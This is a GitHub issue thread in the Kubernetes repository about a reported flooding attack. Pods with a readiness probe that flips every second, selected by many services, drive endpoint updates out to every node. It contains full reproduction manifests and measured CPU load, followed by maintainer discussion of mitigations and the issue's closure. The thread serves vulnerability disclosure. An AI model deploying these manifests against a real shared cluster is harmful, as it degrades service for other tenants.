Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Pods status changes on one worker node can be lerveraged to make flooding attack to all other nodes in the kubernetes cluster #110596

Closed
younaman opened this issue Jun 15, 2022 · 20 comments
Labels
kind/bug Categorizes issue or PR as related to a bug. lifecycle/stale Denotes an issue or PR has remained open with no activity and has become stale. sig/network Categorizes an issue or PR as relevant to SIG Network. sig/security Categorizes an issue or PR as relevant to SIG Security. triage/accepted Indicates an issue or PR is ready to be actively worked on.

Comments

@younaman
Copy link

What happened?

In a Kubernetes cluster, each node has its Kube-proxy and kubelet components. For Kube-proxy, it will watch the modification of service/endpoints informed by API-server, and update local iptables; For Kubelet, it will send messages to Kube-apiserver when local pods' status change.

So, when a pod status related to a service/endpoints has changed on a worker node, the worker node's kubelet will send messages to the Kube-apiserver on the control plane, while the Kube-apiserver received the pod's status change, it will update the status of the related endpoint in etcd, and push related endpoint changes message to all other nodes' Kube-proxy, all other nodes' Kube-proxy will modify its local iptables.

As a result, a malicious user's service can change its pods status, trigger the Kube-apiserver push endpoint changes to all other nodes, making processes (iptables, calico, etc.) on other nodes consume CPU/memory resources, making flooding attack.

What did you expect to happen?

We have reported a similar DoS issue to Kubernetes hackone.com, however, HackerOne said that: "all Denial-of-Service findings are out-of-scope". So I try to write my issue on GitHub and I want to know that:

  1. Is it a real issue?

  2. If it is a real issue, are there any ways to defend against this problem fundamentally?

  3. As far as I am concerned, the problem is intrinsic to Kubernetes Kube-proxy design, if it is a real issue, does Kubernetes plan to mitigate this issue at least?

How can we reproduce it (as minimally and precisely as possible)?

  1. Deploy 10 malicious pods on one worker node, the template pod.yaml just like this:
apiVersion: v1
kind: Pod
metadata:
  name: test-readiness-1
  namespace: nginx-test
  labels:
    app: nginx-1
spec:
  nodeName: younaman-thinkpad
  containers:
  - name: nginx
    image: nginx
    args:
    - /bin/sh
    - -c
    - while true;do touch /tmp/healthy;sleep 1;rm -rf /tmp/healthy;sleep 1;done
    readinessProbe:
      exec:
        command:
        - cat
        - /tmp/healthy
      initialDelaySeconds: 1
      periodSeconds: 1
      failureThreshold: 1
      timeoutSeconds: 1
      successThreshold: 1
    imagePullPolicy: IfNotPresent
    ports:
    - containerPort: 80

These 10 pods are all on younaman-thinkpad worker node, and try to change the pod's ready status per second.
2. Deploy one deployment that has 90 pods, all these 90 pods, and the former 10 pods both have label: nginx-1

apiVersion: apps/v1
kind: Deployment
metadata:
  namespace: nginx-test
  name: nginx-normal-deployment
spec:
  selector:
    matchLabels:
      app: nginx-1
  replicas: 90
  template:
    metadata:
      labels:
        app: nginx-1
    spec:
      nodeName: younaman-thinkpad
      restartPolicy: Always
      containers:
      - name: nginx
        image: nginx
        imagePullPolicy: IfNotPresent
        ports:
        - containerPort: 80
  1. Deploy 30 services, each of them corresponding to the former nginx-1 pods group, in other words, I leverage 30 services to create 30 endpoints.
apiVersion: v1
kind: Service
metadata:
  namespace: nginx-test
  name: nginx-service-1
spec:
  selector:
    app: nginx-1
  ports:
  - protocol: TCP
    port: 80
    targetPort: 80

apiVersion: v1
kind: Service
metadata:
  namespace: nginx-test
  name: nginx-service-2
spec:
  selector:
    app: nginx-1
  ports:
  - protocol: TCP
    port: 80
    targetPort: 80
...

On our local testbed,(1 master, 2 worker node, each has 4 core CPU and 8GB memory), by doing like this, on the control plane node, the api-server/etcd/calico etc. processes will consume 60% CPU resources, on the other worker nodes, the calico/kube-proxy/iptables etc. processes will consume 20% CPU, and the incoming network bandwidth on other worker nodes is 1M/s. All these mean a flooding attack.

Anything else we need to know?

No response

Kubernetes version

$ kubectl version
Client Version: version.Info{Major:"1", Minor:"21", GitVersion:"v1.21.1", GitCommit:"5e58841cce77d4bc13713ad2b91fa0d961e69192", GitTreeState:"clean", BuildDate:"2021-05-12T14:18:45Z", GoVersion:"go1.16.4", Compiler:"gc", Platform:"linux/amd64"}
Server Version: version.Info{Major:"1", Minor:"21", GitVersion:"v1.21.1", GitCommit:"5e58841cce77d4bc13713ad2b91fa0d961e69192", GitTreeState:"clean", BuildDate:"2021-05-12T14:12:29Z", GoVersion:"go1.16.4", Compiler:"gc", Platform:"linux/amd64"}

Cloud provider

OS version

# On Linux:
$ cat /etc/os-release
# paste output here
$ uname -a
# paste output here

# On Windows:
C:\> wmic os get Caption, Version, BuildNumber, OSArchitecture
# paste output here

Install tools

Container runtime (CRI) and version (if applicable)

Related plugins (CNI, CSI, ...) and versions (if applicable)

@younaman younaman added the kind/bug Categorizes issue or PR as related to a bug. label Jun 15, 2022
@k8s-ci-robot k8s-ci-robot added needs-sig Indicates an issue or PR lacks a `sig/foo` label and requires one. needs-triage Indicates an issue or PR lacks a `triage/foo` label and requires one. labels Jun 15, 2022
@k8s-ci-robot
Copy link
Contributor

@younaman: This issue is currently awaiting triage.

If a SIG or subproject determines this is a relevant issue, they will accept it by applying the triage/accepted label and provide further guidance.

The triage/accepted label can be added by org members by writing /triage accepted in a comment.

Instructions for interacting with me using PR comments are available here. If you have questions or suggestions related to my behavior, please file an issue against the kubernetes/test-infra repository.

@younaman younaman changed the title Endpoints's status changes on one worker node can make flooding attack to all other nodes in the kubernetes cluster Pods status changes on one worker node can be lerveraged to make flooding attack to all other nodes in the kubernetes cluster Jun 15, 2022
@wangyysde
Copy link
Member

/cc @wangyysde

@neolit123
Copy link
Member

/sig security network

@k8s-ci-robot k8s-ci-robot added sig/security Categorizes an issue or PR as relevant to SIG Security. sig/network Categorizes an issue or PR as relevant to SIG Network. and removed needs-sig Indicates an issue or PR lacks a `sig/foo` label and requires one. labels Jun 15, 2022
@younaman
Copy link
Author

Knock knock! Are there any updates or comments?

@younaman
Copy link
Author

@aojea @chrisohaver @neolit123 @pacoxu Are there any suggestions or comments about my questions? Looking forward to your reply :)

@younaman
Copy link
Author

@wangyysde @aojea @chrisohaver @neolit123 @pacoxu It has been 5 days and are there any suggestions or comments about my questions? Looking forward to your reply :)

@chrisohaver
Copy link
Contributor

I’m not knowledgeable enough on the subject to answer.

@younaman
Copy link
Author

@chrisohaver Thanks for your reply! Because you are the Kubernetes contributor, so I want to know that have you know someone who can give me some comments? Looking forward to your reply!

@pacoxu
Copy link
Member

pacoxu commented Jun 20, 2022

For security issues, I think you can submit it to https://hackerone.com/kubernetes/thanks?type=team.

For me, I think what we can do on this:

  • add a Quota to limit service creating
  • monitoring for pod continuously restart or recreate and add alert(pod backoff is a warning event, and many warning events should be an alert.)
  • if this is a batch of short-term-running jobs with service/endpoints, this may be expected. It depends.

@younaman
Copy link
Author

@pacoxu I reported similar DoS issue to hackerone.com, however, hackerone told me that "DoS attacks is out of scope." Are you sure that my report will not get a similar "out of scope?"

By the way, thanks for your mitigation suggestions! However, I want to know the answers to my questions:

  1. Is it a real issue?

  2. If it is a real issue, are there any ways to defend against this problem fundamentally?
    (You have offered me some mitigation suggestions:) Thank you again for that!)

  3. As far as I am concerned, the problem is intrinsic to Kubernetes Kube-proxy design, if it is a real issue, does Kubernetes plan to mitigate this issue at least?

@pacoxu
Copy link
Member

pacoxu commented Jun 20, 2022

I'm not sure. 😓

@thockin
Copy link
Member

thockin commented Jun 22, 2022

It's hard to call this an "issue". We need to be able to fail readiness on pods and we need to be able to update the endpoints on every client (node) in a reasonably short time window. Otherwise we end up routing traffic to dead endpoints.

EndpointSlice was designed to mitigate some of the impact here, but ultimately the updates must flow.

kube-proxy has a rate-limited write to iptables, so it can only do that every so often (though looking at it, that default may be too low).

The best we could do would be to rate limit updates per namespace or something like that.

I'llleave this open to discuss, but it's not a super compelling option.

@younaman
Copy link
Author

@thockin Thanks for your comments and suggestions!

  1. I have read the kube-proxy official document. I noticed that the minimum interval of how often the iptables rules can be refreshed as endpoints and services change is 1s. In my attack, I didn't change the default interval and it do make a flooding attack on other nodes. It is a "problem" or so-called "configuration problem" at least, do you agree with my opinion?

  2. By the way, in my opinion, this problem is intrinsic to the kube-proxy design. The information channel leveraged by this flooding attack will exist forever if you need to leverage the kube-proxy to sync endpoints status to other worker nodes no matter how often the interval is?

  3. "The best we could do would be to rate limit updates per namespace or something like that.". It's a good point! Perhaps we can make the minimum interval per namespace or per service? However, I am concerned that this potential solution may carry out "unnecessary trouble" for Kubernetes admin or namespace's owner.

  4. Perhaps we can add a comment or warning in the Kubernetes official document about the minimal interval at least? Most people may not realize this potential risk carried out by the default interval configuration?

Looking forward to your reply!

@thockin thockin added triage/accepted Indicates an issue or PR is ready to be actively worked on. and removed needs-triage Indicates an issue or PR lacks a `triage/foo` label and requires one. labels Jun 23, 2022
@danwinship
Copy link
Contributor

#110268 may help this by making each iptables-restore call much smaller

@thockin
Copy link
Member

thockin commented Jun 23, 2022

It is a "problem" or so-called "configuration problem" at least, do you agree with my opinion?

The problem is, I think, that it's a purely static config. We could consider something more dynamic, like the holdoff period being proportional to how long the run took. If it takes 10 seconds to sync, we should probably hold off more than if it takes 0.3 seconds. I think. It could also be dynamic based on offender - we could consider "rare" events to be more urgent and "common" ones to be eligible for backoff. We could even get really smart and say "this particular endpoint seems to be flapping, so we leave it disabled longer". This is a significant change - it will require local decision making and caching and expiry.

It's not clear that this is justified, yet. I have not seen a lot of reports of this being a real problem in the wild. I'm in favor of considering options, but I haven't yet come up with one that is obviously right.

@younaman
Copy link
Author

@thockin Thanks for your reply! It is a hard choice between flexibility and security :)Besides, please notice the second point I comment: "The information channel leveraged by this flooding attack will exist forever if you need to leverage the kube-proxy to sync endpoints status to other worker nodes no matter how often the interval is?" Perhaps this problem is intrinsic to kube-proxy design and there does not exist a silver bullet to solve this problem fundamentally?

@k8s-triage-robot
Copy link

The Kubernetes project currently lacks enough contributors to adequately respond to all issues and PRs.

This bot triages issues and PRs according to the following rules:

  • After 90d of inactivity, lifecycle/stale is applied
  • After 30d of inactivity since lifecycle/stale was applied, lifecycle/rotten is applied
  • After 30d of inactivity since lifecycle/rotten was applied, the issue is closed

You can:

  • Mark this issue or PR as fresh with /remove-lifecycle stale
  • Mark this issue or PR as rotten with /lifecycle rotten
  • Close this issue or PR with /close
  • Offer to help out with Issue Triage

Please send feedback to sig-contributor-experience at kubernetes/community.

/lifecycle stale

@k8s-ci-robot k8s-ci-robot added the lifecycle/stale Denotes an issue or PR has remained open with no activity and has become stale. label Sep 22, 2022
@khenidak
Copy link
Contributor

to add, pod status update is a privileged api. Having said that. it is unlikely that pod status will change every second unless somebody is presenting itself of a kubelet like privilege api-server and is patching pod object on a tight loop. Both kubelet (the upstream patching side), api-server, and kube-proxy run with rate limits that should prevent that.

@aojea
Copy link
Member

aojea commented Sep 26, 2022

/close

there is no evidence of DoS attack , just a way to generate more change of status and consume more resources

@k8s-ci-robot
Copy link
Contributor

@aojea: Closing this issue.

In response to this:

/close

there is no evidence of DoS attack , just a way to generate more change of status and consume more resources

Instructions for interacting with me using PR comments are available here. If you have questions or suggestions related to my behavior, please file an issue against the kubernetes/test-infra repository.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
kind/bug Categorizes issue or PR as related to a bug. lifecycle/stale Denotes an issue or PR has remained open with no activity and has become stale. sig/network Categorizes an issue or PR as relevant to SIG Network. sig/security Categorizes an issue or PR as relevant to SIG Security. triage/accepted Indicates an issue or PR is ready to be actively worked on.
Projects
None yet
Development

No branches or pull requests